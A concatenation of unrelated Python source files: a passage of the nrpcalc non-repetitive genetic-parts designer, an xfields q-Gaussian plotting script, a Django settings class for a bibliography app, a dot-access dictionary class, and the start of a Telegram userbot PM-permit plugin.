print(' Local Model fn. returned a non-boolean evaluation: {}\n'.format(
state))
raise e
# Index satisfactory?
try:
if state == False:
index = int(index)
assert 0 <= index <= i
except Exception as e:
print(' Local Model fn. failed to evaluate partial path: {}'.format(
candidate_str))
print(' Local Model fn. returned a non-integer or invalid traceback index: {}\n'.format(
index))
raise e
# No conflict found!
if state:
return None
# Conflict Found!
else:
return index
def _get_non_coding_candidate(
self,
meta_seq,
meta_struct,
homology,
local_model_fn,
verbose,
jump=False,
start_seq=None,
allow_internal_repeat=False):
# Setup the data structures
candidate = ['-'] * len(meta_seq) if not start_seq else list(start_seq)
tried_set = [set() for _ in range(len(meta_seq))]
kmer_set = kmerSetArray(size=len(meta_seq))
# Setup indexing
i = 0
roll_back_count = 0
# Main backtracking code
while -1 < i < len(meta_seq):
# Jumping out of iteration
if jump and roll_back_count == homology:
candidate = None
break
# Try to build a candidate
if candidate[i] == '-':
# Phase determination
forward = False
# Case )
if i in meta_struct.rev_paired_dict:
j = meta_struct.rev_paired_dict[i]
pnt = meta_seq[i]
pnt = pnt.intersection(
self.base_compl[candidate[j]])
if len(pnt) > len(tried_set[i]):
forward = True
# Case ( and .
else:
if len(tried_set[i]) < len(meta_seq[i]):
forward = True
# Forward phase - A nucleotide may be chosen
if forward:
# Reset roll_back_count
roll_back_count = 0
# Case ( and .
if not i in meta_struct.rev_paired_dict:
candidate[i] = self.rng.choice(
sorted(meta_seq[i]-tried_set[i]))
tried_set[i].add(candidate[i])
# Case (
if i in meta_struct.paired_dict:
j = meta_struct.paired_dict[i]
# DNA Parts
if self.part_type == 'DNA':
pnt = self.base_compl[candidate[i]][0]
candidate[j] = pnt
# RNA Parts
else:
pnt = meta_seq[j]
pnt = pnt.intersection(
self.base_compl[candidate[i]])
candidate[j] = self.rng.choice(sorted(pnt))
tried_set[j] = set(candidate[j])
# Case )
else:
j = meta_struct.rev_paired_dict[i]
# DNA Parts
if self.part_type == 'DNA':
pnt = self.base_compl[candidate[j]][0]
candidate[i] = pnt
# RNA Parts
else:
pnt = pnt - tried_set[i]
candidate[i] = self.rng.choice(sorted(pnt))
tried_set[i].add(candidate[i])
# Backward phase - Nucleotide choices exhausted, so traceback
else:
# Update roll_back_count
roll_back_count += 1
# Reset and roll back
tried_set[i] = set()
kmer_set[i] = ' '
if i > 0:
# Clear stuff at current index
self._reset_candidate_kmer_set(
candidate,
kmer_set,
i)
# Traceback to previous index
# since current index done
i = self._roll_back(
meta_seq,
meta_struct,
i-1,
homology,
candidate,
tried_set,
kmer_set) + 1
i -= 1
continue
# See if built candidate[i] is valid
# Case ( and .
elif not i in meta_struct.rev_paired_dict:
# Wrong nucleotide selected
if not candidate[i] in meta_seq[i]:
self._reset_candidate_kmer_set(
candidate=candidate,
kmer_set=kmer_set,
i=i)
tried_set[i] = set()
continue
# Case )
elif i in meta_struct.rev_paired_dict:
j = meta_struct.rev_paired_dict[i]
# Paired bases are not complementary
# or, Wrong nucleotide selected
if (not candidate[j] in self.base_compl[candidate[i]]) or \
(not candidate[i] in meta_seq[i]):
self._reset_candidate_kmer_set(
candidate=candidate,
kmer_set=kmer_set,
i=i)
tried_set[i] = set()
continue
# See if the local model function is violated
if local_model_fn:
rbi = self._get_local_roll_back_index(
candidate, i, local_model_fn, verbose)
# Model function violated, and
# a traceback location was determined
if not rbi is None:
roll_back_count = 0 if rbi < i else roll_back_count
i = self._roll_back(
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set,
kmer_set,
rbi)
continue
# Are either of these mers seen previously?
mmer_seen = False
kmer = None
# Handle equal internal and shared repeats
if i >= homology-1:
# Get the kmer/rmer
kmer = ''.join(candidate[i-homology+1:i+1])
rmer = utils.get_revcomp(kmer)
mmer = min(kmer, rmer)
# Case: kmer/rkmer is an internal
# repeat to current part
if not allow_internal_repeat:
# Direct repeat
if kmer in kmer_set:
mmer_seen = True
# Inverted repeat
elif rmer in kmer_set:
mmer_seen = True
# Palindrome repeat
elif kmer == rmer:
mmer_seen = True
# Case: mmer is a shared repeat with
# a previous part
if not mmer_seen:
if mmer in self.kmer_db:
mmer_seen = True
# Case: mmer is a shared repeat with
# background
if not mmer_seen:
if not self.background is None:
if self.background.K == homology:
if mmer in self.background:
mmer_seen = True
# Handle background repeats
if not mmer_seen and \
not self.background is None and \
homology != self.background.K:
# Determine background K
K = self.background.K
# Check is warranted
if i >= K-1:
# Get the kmer/rmer
kmer = ''.join(candidate[i-K+1:i+1])
rmer = utils.get_revcomp(kmer)
mmer = min(kmer, rmer)
# Actual check
if mmer in self.background:
mmer_seen = True
# Traceback to eliminate repeat
if mmer_seen:
i = self._roll_back(
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set,
kmer_set)
continue
# Everything OK .. insert kmer
if i >= homology-1:
kmer_set[i] = kmer
# Roll forward
i += 1
# Prepare to return candidate
del kmer_set
if candidate is None or '-' in candidate:
return None
else:
return ''.join(candidate)
def _get_opt_pass_count(self, meta_struct, synth_opt, global_model_fn):
opt_criteria_count = 1 # Since candidate must at least be non-repetitive
if meta_struct.folding['status']:
opt_criteria_count += 1
if synth_opt:
opt_criteria_count += 1
if global_model_fn:
opt_criteria_count += 1
return opt_criteria_count
# Diagnostic function -- Shouldn't trigger on experimental changes
def _is_non_coding_construction_verified(self, meta_seq, meta_struct, candidate):
i = 0
while i < len(candidate):
if not candidate[i] in meta_seq[i]:
return False,1,i
if i in meta_struct.paired_dict:
j = meta_struct.paired_dict[i]
if not candidate[j] in self.base_compl[candidate[i]]:
return False,2,i
i += 1
return True,0,0
def _is_synthesis_verified(self, candidate):
return self.synthesis.evaluate(candidate)
def _is_structure_verified(self, meta_struct, struct_type, candidate):
struct_satisfied = 0
# Decide which structure criteria to fulfill
if struct_type == 'centroid':
candidate_structs = [self.fold.evaluate_centroid(
candidate)]
elif struct_type == 'both':
candidate_structs = [self.fold.evaluate_mfe(
candidate)]
candidate_structs.append(self.fold.evaluate_centroid(
candidate))
else:
candidate_structs = [self.fold.evaluate_mfe(
candidate)]
for candidate_struct in candidate_structs:
vienna_meta_struct = self._get_meta_struct(
candidate_struct)
# Ensure all forbidden base indices unpaired
for bp_closed in meta_struct.unpaired_set:
if not vienna_meta_struct.struct[bp_closed] == '.':
return False
# Ensure all paired base indices paired as desired
for bp_open in meta_struct.paired_dict:
if not bp_open in vienna_meta_struct.paired_dict:
break
else:
if meta_struct.paired_dict[bp_open] != vienna_meta_struct.paired_dict[bp_open]:
break
else:
struct_satisfied += 1
# All structure criteria satisfied
if struct_satisfied == len(candidate_structs):
return True
else:
return False
def _get_inverse_fold_candidate(self, start_seq, meta_seq, meta_struct):
inverse_fold_seq = ''.join(char.lower() if len(meta_seq[i]) == 1 else char for i,char in enumerate(start_seq))
return self.fold.design(
seq=inverse_fold_seq, struct=meta_struct.struct).upper()
def _get_verified_non_coding_candidate(self,
homology,
meta_seq,
meta_struct,
struct_type,
synth_opt,
local_model_fn,
global_model_fn,
jump_count,
fail_count,
verbose,
abortion,
allow_internal_repeat=False):
# Setup counts and variables
current_jump_count = 0
current_fail_count = 0
struct_fail_count = 0
synth_fail_count = 0
model_fail_count = 0
seed_seq = None
verified_candidate = None
opt_pass_count = self._get_opt_pass_count(
meta_struct,
synth_opt,
global_model_fn)
while not verified_candidate:
# Try to get a non-repetitive candidate
start_seq = self._get_non_coding_candidate(
meta_seq=meta_seq,
meta_struct=meta_struct,
homology=homology,
local_model_fn=local_model_fn,
verbose=verbose,
jump=current_jump_count < jump_count,
start_seq=seed_seq,
allow_internal_repeat=allow_internal_repeat)
candidate = start_seq
if start_seq:
# If structure unmatched but constraint has base pairings, go for inverse-repair strategy
if meta_struct.inversefolding['status'] and not self._is_structure_verified(
meta_struct, struct_type, start_seq):
inverse_fold_seq = self._get_inverse_fold_candidate(
start_seq,
meta_seq,
meta_struct)
candidate = self._get_non_coding_candidate(
meta_seq=meta_seq,
meta_struct=meta_struct,
homology=homology,
local_model_fn=local_model_fn,
verbose=verbose,
jump=current_jump_count < jump_count,
start_seq=inverse_fold_seq,
allow_internal_repeat=allow_internal_repeat)
opt_count = 0
# If valid candidate then process
if candidate:
current_jump_count = 0
opt_count += 1
# Diagnostic block -- Shouldn't trigger on experimental changes
construction = self._is_non_coding_construction_verified(
meta_seq,
meta_struct,
candidate)
construction_state = construction[0]
error_digest = construction[1:]
if not construction_state:
current_fail_count += 1
raise Exception(
'Maker built a rogue candidate: {}\nError Digest: {}\nPlease report issue to authors.'.format(
candidate,
error_digest))
else:
pass
# Synthesis optimization
if synth_opt:
if self._is_synthesis_verified(candidate):
opt_count += 1
else:
synth_fail_count += 1
# Global model optimization
if global_model_fn:
# Try to evaluate the global_model_fn on candidate_str
outcome = True
try:
outcome = global_model_fn(candidate)
except Exception as e:
print(' Global Model fn. failed to evaluate complete path: {}\n'.format(
candidate))
raise e
# Outcome satisfactory?
try:
assert outcome in [True, False]
except Exception as e:
print(' Global Model fn. returned a non-boolean state: {}\n'.format(
outcome))
raise e
# Process outcome
if outcome: # True
opt_count += 1
else: # False
model_fail_count += 1
# Structural optimization
if meta_struct.folding['status']:
if self._is_structure_verified(
meta_struct,
struct_type,
candidate):
opt_count += 1
else:
struct_fail_count += 1
# Did everything get optimized?
if opt_count == opt_pass_count:
verified_candidate = candidate
else:
current_fail_count += 1
# Failure count exceeded, terminate
if current_fail_count == fail_count:
break
# No candidate produced
else:
# No jumps made yet no non-repetitive candidate found
if current_jump_count >= jump_count:
break
# Increase current_jump_count
else:
current_jump_count += 1
# Abortion limit reached?
if abortion and current_jump_count >= jump_count:
break
if int(verbose) > 1:
print('\n [seq fails] {}, [struct fails] {}, [synth fails] {}, [global fails] {}, [opt fails] {}'.format(
current_jump_count,
struct_fail_count,
synth_fail_count,
model_fail_count,
current_fail_count))
return verified_candidate, current_jump_count+1, current_fail_count+1
def _get_non_coding_nrps(
self,
homology,
seq,
struct,
struct_type,
target,
synth_opt,
local_model_fn,
global_model_fn,
jump_count,
fail_count,
verbose,
abortion,
allow_internal_repeat=False):
# Setup structures
seq = seq.upper()
meta_struct = self._get_meta_struct(
struct=self._get_adjusted_struct(struct, seq))
meta_seq = self._get_meta_seq(
seq=seq,
meta_struct=meta_struct)
seq_count = 0
iter_count = 0
time_sum = 0.0
begin_time = time()
break_flag = False
# Setup Bernoulli Success model
total_jump_trials = jump_count
total_jump_successes = 1
curr_jump_prob = berno.get_prob(
trials=total_jump_trials,
success=total_jump_successes)
curr_jump_trial = jump_count
total_fail_trials = fail_count
total_fail_successes = 1
curr_fail_prob = berno.get_prob(
trials=total_fail_trials,
success=total_fail_successes)
curr_fail_trial = fail_count
# Stream parts until completion
while True:
t0 = time()
candidate, curr_jump_trial, curr_fail_trial = self._get_verified_non_coding_candidate(
homology,
meta_seq,
meta_struct,
struct_type,
synth_opt,
local_model_fn,
global_model_fn,
curr_jump_trial,
curr_fail_trial,
verbose,
abortion,
allow_internal_repeat)
if candidate is None:
break_flag = True
# Got a canidate -- will try again
if not break_flag:
final_candidate = candidate
update_status = True
try:
for kmer in utils.stream_min_kmers(
seq=candidate,
k=homology):
self.kmer_db.add(kmer)
except Exception as E:
update_status = False
if not update_status: # Memory full
if verbose:
print('[ERROR] Memory Full ... Breaking Loop')
yield update_status
seq_count += 1
time_sum += time()-t0
iter_count += 1
if verbose:
print(' [part] {}, [{}-mers] {}, [iter time] {:.2f}s, [avg time] {:.2f}s, [total time] {:.2f}h'.format(
seq_count,
homology,
len(self.kmer_db),
time()-t0, time_sum / iter_count,
(time() - begin_time) / 3600.0))
yield final_candidate
# No more parts required
if seq_count == target:
break
# No more candidates to build
else:
yield candidate
break
# Update failure limits based on Bernoulli Success model
total_jump_trials += curr_jump_trial
total_jump_successes += 1
curr_jump_prob = berno.get_prob(trials=total_jump_trials, success=total_jump_successes)
curr_jump_trial = berno.get_trials(prob=curr_jump_prob)
total_fail_trials += curr_fail_trial
total_fail_successes += 1
curr_fail_prob = berno.get_prob(trials=total_fail_trials, success=total_fail_successes)
curr_fail_trial = berno.get_trials(prob=curr_fail_prob)
def _check_maker_constraints(
self,
seq,
struct,
part_type,
allow_internal_repeat,
target,
homology):
# Sequence Legality 1
if not isinstance(seq, str):
print('\n [ERROR] Sequence Constraint must be a string, not {}'.format(type(seq)))
print(' [SOLUTION] Try correcting Sequence Constraint\n')
return False
# Sequence Legality 2
if len(seq) < 5:
print('\n [ERROR] Sequence Constraint must be longer than 4 bases, not {}'.format(len(seq)))
print(' [SOLUTION] Try using a longer Sequence Constraint\n')
return False
# Structure Legality 1
if not isinstance(struct, str):
print('\n [ERROR] Structure Constraint must be a string, not {}'.format(type(struct)))
print(' [SOLUTION] Try correcting Structure Constraint\n')
return False
# Structure Legality 2
if len(struct) != len(seq):
print('\n [ERROR] Structure Constraint must be same length as Sequence Constraint ({}), not {}'.format(
len(seq),
len(struct)))
print(' [SOLUTION] Try correcting length of Structure Constraint\n')
return False
# Part Type Legality 1
if not isinstance(part_type, str):
print('\n [ERROR] Part Type must be a string, not \'{}\''.format(type(part_type)))
print(' [SOLUTION] Try correcting Part Type\n')
return False
# Part Type Legality 2
if not part_type in ['DNA', 'RNA']:
print('\n [ERROR] Part Type must be \'RNA\' or \'DNA\', not \'{}\''.format(part_type))
print(' [SOLUTION] Try correcting Part Type\n')
return False
# Sequence Legality 3
seq_legal, seq_illegal_chars = makerchecks.is_seq_constr_legal(seq, part_type)
if not seq_legal:
print('\n [ERROR] {} Sequence Constraint is not legal due to chars: {}'.format(part_type, seq_illegal_chars))
print(' [SOLUTION] Try correcting Sequence Constraint or Part Type\n')
return False
# Structure Legality 3
struct_legal, unclosed, unopened, invalid = makerchecks.is_structure_valid(struct)
if not struct_legal:
print('\n [ERROR] Structure Constraint is illegal or unbalanced')
if unclosed:
print(' [ERROR] >> Unclosed bases at locations: {}'.format(unclosed))
if unopened:
print(' [ERROR] >> Unopened bases at locations: {}'.format(unopened))
if invalid:
print(' [ERROR] >> Invalid characters at locations: {}'.format(invalid))
print(' [SOLUTION] Try correcting Structure Constraint\n')
return False
# Sequence + Structure + Part Type Base Pairing Combination Legality
combo_state, incompat_locs, reduced_locs = makerchecks.is_pairing_compatible(seq, struct, part_type)
if not combo_state:
if incompat_locs:
print('\n [ERROR] Incompatible Base Pairing for {} Parts at locations: {}'.format(part_type, incompat_locs))
print(' [SOLUTION] Try correcting Sequence Constraint or Part Type\n')
return False
if reduced_locs: # -- soft check
print('\n [WARNING] Reducible Paired Bases at locations: {}'.format(reduced_locs))
print(' [WARNING] Fewer Parts may be Generated')
# Lmax Legality 1
if not isinstance(homology, int):
print('\n [ERROR] Lmax must be an integer, not {}'.format(type(homology)))
print(' [SOLUTION] Try correcting Lmax\n')
return False
# Lmax Legality 2
if homology-1 < 5:
print('\n [ERROR] Lmax must be greater than 4, not {}'.format(homology-1))
print(' [SOLUTION] Try correcting Lmax\n')
return False
# Lmax Legality 3
if homology-1 >= len(seq):
print('\n [ERROR] Lmax must be less than length of Sequence Constraint ({}), not {}'.format(len(seq), homology-1))
print(' [SOLUTION] Try correcting Lmax\n')
return False
# Target Size Legality 1
if not isinstance(target, int):
print('\n [ERROR] Target Size must be an integer, not {}'.format(type(target)))
print(' [SOLUTION] Try correcting Target Size\n')
return False
# Target Size Legality 2
if target < 1:
print('\n [ERROR] Target Size must be greater than 0, not {}'.format(target))
print(' [SOLUTION] Try correcting Target Size\n')
return False
# Sequence Sufficiency -- soft check
seq_sufficient, constrained_motif_locs = makerchecks.is_seq_constr_sufficient(seq, struct, homology, target)
if not seq_sufficient:
print('\n [WARNING] Target Size of {} may be unreachable from given Sequence/Structure Constraint and Lmax of {}'.format(target, homology-1))
print(' [WARNING] >> Lmax limiting windows between locations: {}'.format(constrained_motif_locs))
print(' [WARNING] Fewer Parts may be Generated')
# Internal Repeats Legality
if not allow_internal_repeat in [True, False]:
print('\n [ERROR] Internal Repeat must be boolean, not {}'.format(type(allow_internal_repeat)))
print(' [SOLUTION] Try correcting Internal Repeat\n')
return False
# Structure Sufficiency
if not allow_internal_repeat:
struct_sufficient, long_hairpins = makerchecks.is_structure_not_conflict(struct, homology)
if not struct_sufficient:
print('\n [ERROR] Structure Constraint is insufficient based on given Lmax')
for long_hairpin in long_hairpins:
print(' [ERROR] >> Long hairpin at locations: {}'.format(long_hairpin))
print(' [SOLUTION] Try relaxing Structure Constraint or setting internal_repeats=True')
print()
return False
return True
def _check_maker_inputs(
self,
struct_type,
synth_opt,
jump_count,
fail_count,
output_file,
verbose):
# Struct Type Legality
if not struct_type in ['mfe', 'centroid', 'both']:
print('\n [ERROR] Struct Type must be \'mfe\', \'centroid\' or \'both\', not \'{}\''.format(struct_type))
print(' [SOLUTION] Try correcting Part Type\n')
return False
# Synth Optimization Legality
if not synth_opt in [True, False]:
print('\n [ERROR] Synth Opt must be True or False, not {}'.format(synth_opt))
print(' [SOLUTION] Try correcting Synth Opt\n')
return False
# Jump Count Legality 1
if not isinstance(jump_count, int):
print('\n [ERROR] Jump Count must be an integer, not {}'.format(type(jump_count)))
print(' [SOLUTION] Try correcting Jump Count\n')
return False
# Jump Count Legality 2
if jump_count < 0:
print('\n [ERROR] Jump Count must be greater than 0, not {}'.format(jump_count))
print(' [SOLUTION] Try correcting Jump Count\n')
return False
# Fail Count Legality 1
if not isinstance(fail_count, int):
print('\n [ERROR] Fail Count must be an integer, not {}'.format(type(fail_count)))
print(' [SOLUTION] Try correcting Fail Count\n')
return False
# Fail Count Legality 2
if fail_count < 0:
print('\n [ERROR] Fail Count must be greater than 0, not {}'.format(fail_count))
print(' [SOLUTION] Try correcting Fail Count\n')
return False
# Output File Legality
if not output_file is None:
if not isinstance(output_file, str):
print('\n [ERROR] Output File must be a string or None, not {}'.format(type(output_file)))
print(' [SOLUTION] Try correcting Output File\n')
return False
# Everything OK
return True
def nrp_maker(self,
homology,
seq_constr,
struct_constr,
target_size,
background=None,
struct_type=None,
synth_opt=True,
local_model_fn=None,
global_model_fn=None,
jump_count=10,
fail_count=1000,
output_file=None,
verbose=True,
abortion=True,
allow_internal_repeat=False,
check_constraints=True):
if verbose:
print('\n[Non-Repetitive Parts Calculator - Maker Mode]')
build_parts = True
# Check Maker Constraints
if check_constraints:
if verbose:
print('\n[Checking Constraints]')
print(' Sequence Constraint: {}'.format(seq_constr))
print(' Structure Constraint: {}'.format(struct_constr))
print(' Part Type : {}'.format(self.part_type))
print(' Lmax : {} bp'.format(homology-1))
print(' Target Size : {} parts'.format(target_size))
print(' Internal Repeats : {}'.format(allow_internal_repeat))
check_status = self._check_maker_constraints(
seq_constr,
struct_constr,
self.part_type,
allow_internal_repeat,
target_size,
homology)
if check_status == False:
if verbose:
print(' Check Status: FAIL\n')
build_parts = False
else:
if verbose:
print('\n Check Status: PASS')
# Background Check
if build_parts:
if not background is None:
if verbose:
print('\n[Checking Background]\n Background: {}'.format(background))
if isinstance(background, kmerSetDB):
if background.K > len(seq_constr):
build_parts = False
print('\n [ERROR] Background Lmax of {} is greater than desired part length ({}-bp)'.format(
background.K-1,
len(seq_constr)))
print(' [SOLUTION] Try using a background with Lmax less than or equal to part length\n')
if verbose:
print(' Check Status: FAIL\n')
if build_parts and not background.ALIVE:
build_parts = False
print('\n [ERROR] Background is closed or dropped')
print(' [SOLUTION] Try using an open Background\n')
if verbose:
print(' Check Status: FAIL\n')
if build_parts:
if verbose:
print('\n Check Status: PASS')
else:
build_parts = False
print('\n [ERROR] Background Object is INVALID')
print(' [SOLUTION] Try instantiating background via nrpcalc.background(...)\n')
if verbose:
print(' Check Status : FAIL\n')
# Arguments Check
if build_parts:
if verbose:
print('\n[Checking Arguments]')
print(' Struct Type : {}'.format(struct_type))
print(' Synth Opt : {}'.format(synth_opt))
print(' Jump Count: {}'.format(jump_count))
print(' Fail Count: {}'.format(fail_count))
print(' Output File : {}'.format(output_file))
check_status = self._check_maker_inputs(
struct_type,
synth_opt,
jump_count,
fail_count,
output_file,
verbose)
if check_status == False:
if verbose:
print(' Check Status: FAIL\n')
build_parts = False
else:
if verbose:
print('\n Check Status: PASS')
if not build_parts:
# Cleanups
self.background = None
self.kmer_db = None
raise RuntimeError('Invalid Constraints, Background or Arguments')
# Separate Checks from Build Logs
if verbose:
print()
# kmer_db and background Setup
projector.setup_proj_dir(self.proj_id)
self.kmer_db = set()
self.background = background
# self.kmer_db = kmerSetDB(
# path='./{}/kmerDB'.format(self.proj_id),
# homology=homology,
# verbose=verbose)
# Project Setup
if output_file is None:
projector.setup_proj_dir(self.proj_id)
output_file = './{}/seq_list.fa'.format(self.proj_id)
# Execute Maker
with open(output_file, 'w') as out_file:
seq_constr = seq_constr.upper()
struct_constr = self._get_adjusted_struct(
struct_constr,
seq_constr)
current_nrp_count = 0
memory_exhausted = False
if verbose:
print('Constructing Toolbox:\n')
for non_coding_nrp in self._get_non_coding_nrps(
homology,
seq_constr,
struct_constr,
struct_type,
target_size,
synth_opt,
local_model_fn,
global_model_fn,
jump_count,
fail_count,
verbose,
abortion,
allow_internal_repeat):
# Write out genetic part
if non_coding_nrp:
out_file.write(
'>non-repetitive part {}\n'.format(
current_nrp_count+1))
non_coding_nrp = '\n'.join(
textwrap.wrap(
non_coding_nrp, 80))
out_file.write('{}\n'.format(
non_coding_nrp))
current_nrp_count += 1
else:
if non_coding_nrp is None:
if verbose:
print('Failure Limits Exceeded or k-mers Exhausted. Cannot Build More Parts.')
else:
if verbose:
print('Memory Capacity at Full. Cannot Build More Parts.')
memory_exhausted = True
# Memory no longer available ... stop
if memory_exhausted:
break
if verbose:
print('\nConstruction Complete.\n')
# Detach Background
self.background = None
# Remove kmerSetDB
# self.kmer_db.drop()
self.kmer_db = None
# Pack output in dictionary
parts_dict = {}
for i,line in enumerate(utils.stream_fasta_seq_list(output_file)):
line = line.strip()
parts_dict[i] = line
# Cleanups and Return
projector.remove_proj_dir()
if verbose:
print('Non-Repetitive Toolbox Size: {}'.format(current_nrp_count))
return parts_dict
def main():
homology = 16
sm_obj = NRPMaker(seed=7)
# Hammerhead Nielsen Paper
seq = 'NNNN AGNNNU CANNNNN UGUGCUU NNNNNU CUGAUGA NNNN GUGA NNNN GAAA NNNC CUCU NNNNN UAAU NNNNN UUAA NNNN' # Nielsen Like
struct = 'xxxx x((((( x(((((( xxxxxxx )))))) xxxxxxx (((( xxxx )))) xxx) )))) xxxx ((((( xxxx ))))) xxxx xxxx'
seq = ''.join(seq.split(' '))
struct = ''.join(struct.split(' '))
output_file = None #'riboz.fa'
background = None #utils.get_fasta_seq_list(fasta_filename='input.fa.bk104')
# Final Result Store
final_toolbox = {}
# Initialize Background
background = kmerSetDB(
path='./testDB',
homology=homology,
verbose=True)
# background.multiadd(
# utils.get_fasta_seq_list(
# fasta_filename='input.fa.bk104'))
# Background Based Single Part Design Works
t0 = time()
tt = 0
toolbox1 = sm_obj.nrp_maker(homology, [seq], [struct], [10],
struct_type='mfe',
background=background,
jump_count=100,
fail_count=1000,
synth_opt=False,
verbose=True,
abortion=True,
allow_internal_repeat=True,
output_file=output_file)
tt += time() - t0
final_toolbox.update(
zip(range(len(final_toolbox), len(final_toolbox)+len(toolbox1)),
toolbox1.values()))
# Adding More Background Post Design Works
background.multiadd(toolbox1.values())
# Serial Designs from Multiple Constraints Works
t0 = time()
toolbox2 = sm_obj.nrp_maker(homology, [seq]*2, [struct]*2, [20]*2,
struct_type='mfe',
background=background,
jump_count=100,
fail_count=1000,
synth_opt=False,
verbose=True,
abortion=True,
allow_internal_repeat=False,
output_file=output_file)
tt += time() - t0
final_toolbox.update(
zip(range(len(final_toolbox), len(final_toolbox)+len(toolbox2)),
toolbox2.values()))
# Assert All Parts Unique and Non-Repetitive
assert len(set(final_toolbox.values())) == len(
finder.nrp_finder(final_toolbox.values(), homology, None, verbose=False))
# Drop Background
background.drop()
# Report Time Elapsed
print('\nWall Time {} sec'.format(tt))
if __name__ == '__main__':
main()
|
import time
import numpy as np
import xobjects as xo
from xfields.contexts import add_default_kernels
from pysixtrack.be_beamfields.gaussian_fields import get_Ex_Ey_Gx_Gy_gauss
from pysixtrack.mathlibs import MathlibDefault
ctx = xo.ContextCpu()
ctx = xo.ContextCpu(omp_num_threads=4)
#ctx = xo.ContextCupy()
#ctx = xo.ContextPyopencl()
print(ctx)
kernel_descriptions = {'q_gaussian_profile':{
'args':(
(('scalar', np.int32 ), 'n'),
(('array', np.float64), 'z'),
(('scalar', np.float64), 'z0'),
(('scalar', np.float64), 'z_min'),
(('scalar', np.float64), 'z_max'),
(('scalar', np.float64), 'beta'),
(('scalar', np.float64), 'q'),
(('scalar', np.float64), 'q_tol'),
(('scalar', np.float64), 'factor'),
(('array', np.float64), 'res'),
),
'num_threads_from_arg': 'n'
},}
ctx.add_kernels(src_files=['../../../xfields/src/qgaussian.h'],
kernel_descriptions=kernel_descriptions)
import matplotlib.pyplot as plt
plt.close('all')
plt.figure(1)
for qq in [0.95, 1., 1.05]:
z = np.linspace(-2., 2., 1000)
res = 0*z
ctx.kernels.q_gaussian_profile(
n=len(z),
z=z,
z0=0.5,
z_min=-0.8,
z_max=1.9,
beta=1./2./0.5**2,
q=qq,
q_tol=1e-10,
factor=1,
res=res)
plt.plot(z, res, label=f'q={qq}')
plt.legend(loc='best')
plt.show()
|
# -*- coding: utf-8 -*-
"""Module that defines a class through which application configuration settings can be retrieved."""
import typing as t
class Settings:
"""Container to provide configuration settings for the application."""
def __init__(self, prefix: str):
"""Initialize the class.
:param prefix: the prefix with which application settings can be configured globally. The prefix will be
automatically converted to all uppercase.
"""
self.prefix = prefix.upper()
def _get_setting(self, name: str, default: t.Any) -> t.Any:
"""Retrieve the setting with the given name from the loaded settings or return the specified default.
.. note:: The module :mod:`django.conf.settings` needs to be imported in this method for it to be up to date.
"""
from django.conf import settings as django_settings
return getattr(django_settings, f'{self.prefix}_{name}', default)
@property
def bibliography_adapter(self) -> str:
"""Return the full import path of the bibliography adapter implementation to use.
The value should be an implementation of :class:`biblary.bibliography.adapter.abstract.BibliographyAdapter`.
"""
return self._get_setting('BIBLIOGRAPHY_ADAPTER', 'biblary.bibliography.adapter.bibtex.BibtexBibliography')
@property
def bibliography_adapter_configuration(self) -> dict:
"""Return the dictionary that will be passed as keyword arguments of the bibliography adapter constructor."""
return self._get_setting('BIBLIOGRAPHY_ADAPTER_CONFIGURATION', {})
@property
def bibliography_storage(self) -> t.Optional[str]:
"""Return the full import path of the bibliography storage implementation to use.
The value should be an implementation of :class:`biblary.bibliography.storage.abstract.AbstractStorage`.
"""
return self._get_setting('BIBLIOGRAPHY_STORAGE', None)
@property
def bibliography_storage_configuration(self) -> dict:
"""Return the dictionary that will be passed as keyword arguments of the bibliography storage constructor."""
return self._get_setting('BIBLIOGRAPHY_STORAGE_CONFIGURATION', {})
@property
def bibliography_main_author_patterns(self) -> t.Sequence[str]:
"""Return a sequence of strings that represent authors that should be marked as main author.
The elements of the sequence can be simple strings or regex patterns.
"""
return self._get_setting('BIBLIOGRAPHY_MAIN_AUTHOR_PATTERNS', ())
@property
def bibliography_main_author_class(self) -> str:
"""Return the CSS class that is used by the :meth:`biblary.templatetags.authors.main_author_class`.
This tag can be used in the index template to add this CSS class to main authors.
"""
return self._get_setting('BIBLIOGRAPHY_MAIN_AUTHOR_CLASS', 'biblary-entry-author-main')
settings: Settings = Settings('BIBLARY')
|
from DTL.api import BaseDict
#------------------------------------------------------------
#------------------------------------------------------------
class DotifyDict(BaseDict):
#------------------------------------------------------------
def __eq__(self, other):
return dict.__eq__(self, other)
#------------------------------------------------------------
def __setitem__(self, key, value):
if '.' in key:
myKey, restOfKey = key.split('.', 1)
target = self.set_default(myKey, DotifyDict())
if not isinstance(target, DotifyDict):
raise KeyError, 'cannot set "{0}" in "{1}" ({2})'.format(restOfKey, myKey, repr(target))
target[restOfKey] = value
else:
if isinstance(value, dict) and not isinstance(value, DotifyDict):
value = DotifyDict(value)
dict.__setitem__(self, key, value)
#------------------------------------------------------------
def __getitem__(self, key):
if '.' not in key:
return dict.__getitem__(self, key)
myKey, restOfKey = key.split('.', 1)
target = dict.__getitem__(self, myKey)
if not isinstance(target, DotifyDict):
raise KeyError, 'cannot get "{0}" in "{1}" ({2})'.format(restOfKey, myKey, repr(target))
return target[restOfKey]
#------------------------------------------------------------
def __contains__(self, key):
if '.' not in key:
return dict.__contains__(self, key)
myKey, restOfKey = key.split('.', 1)
target = dict.__getitem__(self, myKey)
if not isinstance(target, DotifyDict):
return False
return restOfKey in target
#------------------------------------------------------------
def get(self, key, default=None):
try:
return self.__getitem__(key)
except KeyError:
return default
except Exception, e:
raise Exception(e)
#------------------------------------------------------------
def set_default(self, key, default):
if key not in self:
self[key] = default
return self[key]
#------------------------------------------------------------
__setattr__ = __setitem__
__getattr__ = __getitem__
|
import os
import time
import asyncio
import io
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon.tl.functions.users import GetFullUserRequest
from telethon import events, errors, functions, types
from userbot import ALIVE_NAME, CUSTOM_PMPERMIT
from userbot.utils import admin_cmd
PMPERMIT_PIC = os.environ.get("PMPERMIT_PIC", None)
if PMPERMIT_PIC is None:
WARN_PIC = "https://telegra.ph/file/2bffdacf584f596a9d99d.jpg"
else:
WARN_PIC = PMPERMIT_PIC
PM_WARNS = {}
PREV_REPLY_MESSAGE = {}
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Set ALIVE_NAME in config vars in Heroku"
CUSTOM_MIDDLE_PMP = str(CUSTOM_PMPERMIT) if CUSTOM_PMPERMIT else "**YOU HAVE TRESPASSED TO MY MASTERS INBOX** \n`THIS IS ILLEGAL AND REGARDED AS A CRIME`"
